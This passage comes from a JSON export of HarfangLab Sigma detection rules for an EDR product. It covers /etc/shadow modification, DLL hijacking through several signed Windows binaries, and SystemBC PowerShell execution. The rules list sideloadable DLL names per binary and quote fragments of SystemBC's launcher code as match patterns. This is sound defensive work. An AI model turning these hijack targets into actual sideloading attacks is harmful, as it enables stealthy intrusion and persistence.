'/opt/saltstack/salt/bin/python3.?? /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n - ProcessParentCommandLine|startswith:\n - '/opt/saltstack/salt/bin/python3.?? /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n - ProcessGrandparentCommandLine:\n - '/opt/saltstack/salt/bin/python3.?? /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n\n exclusion_snap:\n ProcessImage:\n - '/snap/snapd/??/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/???/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/????/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/?????/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/??????/usr/lib/snapd/snap-update-ns'\n ProcessCommandLine|startswith: 'snap-update-ns'\n\n exclusion_nixos:\n ProcessGrandparentImage: '/nix/store/*-switch-to-configuration-*/bin/switch-to-configuration'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "06168646-4339-42be-bcf4-a8f6ef23f53d",
+ "rule_name": "File /etc/shadow Modified",
+ "rule_description": "Detects a suspicious attempt to modify /etc/shadow.\nThis file contains the encrypted passwords of all the accounts on the system and can be modified to change the password of a user.\nIt is recommended to ensure that both the process modifying this file and the user that requested the modification of a user's password are legitimate.\n",
+ "rule_creation_date": "2022-11-16",
+ "rule_modified_date": "2026-01-21",
+ "rule_os": "linux",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.credential_access"
+ ],
+ "rule_technique_tags": [
+ "attack.t1003.008",
+ "attack.t1078"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "063e3a72-3dc5-411b-8f95-7a288514f8e5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.082122Z",
+ "creation_date": "2026-03-23T11:45:34.082124Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.082129Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
+ "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_chgport.yml",
+ "content": "title: DLL Hijacking via chgport.exe\nid: 063e3a72-3dc5-411b-8f95-7a288514f8e5\ndescription: |\n Detects potential Windows DLL Hijacking via chgport.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'chgport.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\utildll.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "063e3a72-3dc5-411b-8f95-7a288514f8e5",
+ "rule_name": "DLL Hijacking via chgport.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via chgport.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2021-12-10",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "065c4be3-1c64-4884-8239-a03e9bd028e7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.602221Z",
+ "creation_date": "2026-03-23T11:45:34.602224Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.602232Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
+ "https://github.com/xforcered/WFH",
+ "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_wlrmdr.yml",
+ "content": "title: DLL Hijacking via wlrmdr.exe\nid: 065c4be3-1c64-4884-8239-a03e9bd028e7\ndescription: |\n Detects potential Windows DLL Hijacking via wlrmdr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wlrmdr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "065c4be3-1c64-4884-8239-a03e9bd028e7",
+ "rule_name": "DLL Hijacking via wlrmdr.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via wlrmdr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2021-12-10",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "06851538-293b-454e-ba25-02a9d4300ca4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.609078Z",
+ "creation_date": "2026-03-23T11:45:34.609082Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.609090Z",
+ "rule_level": "critical",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c",
+ "https://twitter.com/malmoeb/status/1571985877424816130",
+ "https://attack.mitre.org/techniques/T1059/001/"
+ ],
+ "name": "t1059_001_systembc_powershell_execution.yml",
+ "content": "title: SystemBC PowerShell Execution\nid: 06851538-293b-454e-ba25-02a9d4300ca4\ndescription: |\n Detects the execution of the PowerShell version of SystemBC's launcher.\n SystemBC is a Malware-as-a-Service framework involved in numerous ransomware attacks.\n It is recommended to investigate all the PowerShell commands associated with the process.\n It is also recommended to check the process tree for suspicious activities.\nreferences:\n - https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c\n - https://twitter.com/malmoeb/status/1571985877424816130\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/09/27\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Malware.SystemBC\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n PowershellCommand|contains|all:\n - \"For ($*=0; $* -ne 50; $*++) { $*[$*] =* $* }\"\n - '[string]$domain = \"{0}.{1}.{2}.{3}\" -f $a, $b, $c, $d'\n - '[void]$ps.AddParameter(\"Rc4_crypt\", $*)'\n - '[void]$ps.AddParameter(\"xordata_\", $*)'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "06851538-293b-454e-ba25-02a9d4300ca4",
+ "rule_name": "SystemBC PowerShell Execution",
+ "rule_description": "Detects the execution of the PowerShell version of SystemBC's launcher.\nSystemBC is a Malware-as-a-Service framework involved in numerous ransomware attacks.\nIt is recommended to investigate all the PowerShell commands associated with the process.\nIt is also recommended to check the process tree for suspicious activities.\n",
+ "rule_creation_date": "2022-09-27",
+ "rule_modified_date": "2025-02-06",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.command_and_control",
+ "attack.execution"
+ ],
+ "rule_technique_tags": [
+ "attack.t1059.001",
+ "attack.t1071"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "068ce414-d762-41fa-88fd-5e0df21bb756",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.081159Z",
+ "creation_date": "2026-03-23T11:45:34.081161Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.081166Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
+ "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_chglogon.yml",
+ "content": "title: DLL Hijacking via chglogon.exe\nid: 068ce414-d762-41fa-88fd-5e0df21bb756\ndescription: |\n Detects potential Windows DLL Hijacking via chglogon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'chglogon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\REGAPI.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\utildll.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "068ce414-d762-41fa-88fd-5e0df21bb756",
+ "rule_name": "DLL Hijacking via chglogon.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via chglogon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2021-12-10",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "06be143e-b032-4364-923d-de4d6d136dd3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.097139Z",
+ "creation_date": "2026-03-23T11:45:34.097140Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.097145Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://github.com/xforcered/WFH",
+ "https://securityintelligence.com/posts/windows-features-dll-sideloading/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_dsacls.yml",
+ "content": "title: DLL Hijacking via DSACLS.exe\nid: 06be143e-b032-4364-923d-de4d6d136dd3\ndescription: |\n Detects potential Windows DLL Hijacking via DSACLS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'DSACLS.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "06be143e-b032-4364-923d-de4d6d136dd3",
+ "rule_name": "DLL Hijacking via DSACLS.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via DSACLS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2022-09-15",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "06f328a3-6c34-4480-b44a-5ccfa923f899",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.081565Z",
+ "creation_date": "2026-03-23T11:45:34.081567Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.081571Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
+ "https://github.com/xforcered/WFH",
+ "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_gamepanel.yml",
+ "content": "title: DLL Hijacking via gamepanel.exe\nid: 06f328a3-6c34-4480-b44a-5ccfa923f899\ndescription: |\n Detects potential Windows DLL Hijacking via gamepanel.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'gamepanel.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\d2d1.dll'\n - '\\d3d11.dll'\n - '\\dcomp.dll'\n - '\\dwmapi.dll'\n - '\\DWrite.dll'\n - '\\dxgi.dll'\n - '\\msdrm.dll'\n - '\\uianimation.dll'\n - '\\UIAutomationCore.DLL'\n - '\\UxTheme.dll'\n - '\\windowscodecs.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "06f328a3-6c34-4480-b44a-5ccfa923f899",
+ "rule_name": "DLL Hijacking via gamepanel.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via gamepanel.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2021-12-10",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "070c26de-9c37-4449-81eb-9d5f6a91c83b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.593760Z",
+ "creation_date": "2026-03-23T11:45:34.593764Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.593771Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
+ "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_musnotificationux.yml",
+ "content": "title: DLL Hijacking via musnotificationux.exe\nid: 070c26de-9c37-4449-81eb-9d5f6a91c83b\ndescription: |\n Detects potential Windows DLL Hijacking via musnotificationux.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'musnotificationux.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\DMCmnUtils.dll'\n - '\\UpdatePolicy.dll'\n - '\\UPShared.dll'\n - '\\WINHTTP.dll'\n - 